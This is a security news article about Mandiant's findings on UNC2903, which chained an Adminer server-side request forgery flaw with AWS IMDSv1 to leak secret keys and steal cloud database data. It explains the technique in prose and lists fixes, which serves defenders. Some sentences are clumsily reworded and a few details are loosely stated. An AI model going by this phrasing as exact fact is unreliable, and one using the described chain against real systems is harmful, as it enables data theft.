A threat group exploits web applications to steal valuable metadata which, in turn, allows them to steal data from AWS DB instances.
Mandiant researchers discovered an attack operation by a threat group designated as UNC2903. The attack, which took place from May to June last year, saw threat actors steal corporate data from AWS facilities after a long period of reconnaissance.
“Threats identified in campaigns conducted by UNC2903 were multi-phased attacks, which involved infrastructure analysis, reconnaissance and abuse of the underlying layers of abstraction offered by hosted platforms. in the cloud,” the researchers explained in a blog post on Wednesday.
“Once the exploitation and abuse of the underlying systems has occurred, the stolen credentials are exploited for data exfiltration into other AWS services in the compromised tenant.”
Mandiant told SearchSecurity that in this case, no specific industry or sector was targeted by the attack, suggesting the hackers were opportunistic and looking for web applications that were known to be vulnerable to attack.
In this attack, the vulnerable web applications used Adminer, a popular database management tool used to link web applications to cloud database instances. The server-side request forgery flaw, designated CVE-2021-21311, does not provide direct access to AWS secret keys, but allows the attacker to obtain a certain amount of metadata.
This metadata is the key to the attack, according to Mandiant. By interacting with an AWS service called IMDSv1, the attacker can trick the server into returning an error message containing AWS secret keys.
From there, attackers can connect directly to the AWS DB instance and steal the data stored there.
Although Adminer and IMDSv1 were updated to remove each of their respective security flaws, UNC2903 hackers were able to find enough web applications and AWS instances to amass a string of successful data heists. As the attackers focused on AWS, Mandiant said other cloud providers with similar metadata services could be exposed to such attacks.
While administrators can protect their databases from the UNC2903 hacking technique by updating Adminer to version 4.7.9 and IMDSv2, Mandiant researchers noted that a larger problem will prevail as long as companies continue to link their web applications to cloud computing services.
“As adoption of cloud technology grows, so does the threat surface and targeting of vulnerable web infrastructures with outdated or outdated underlying metadata services with limited security capabilities,” they said. explained the researchers. “The level of risk from web application vulnerabilities should be assessed and coupled with the understanding that underlying metadata services in cloud environments could increase the possibility of advanced or ongoing threats.”
Mandiat said he had been tracking UNC2903 since July 2021 but had not assigned the group to a specific nation; the researchers described the group as “opportunistic” but noted that they had not observed threat actors attempting to monetize stolen data.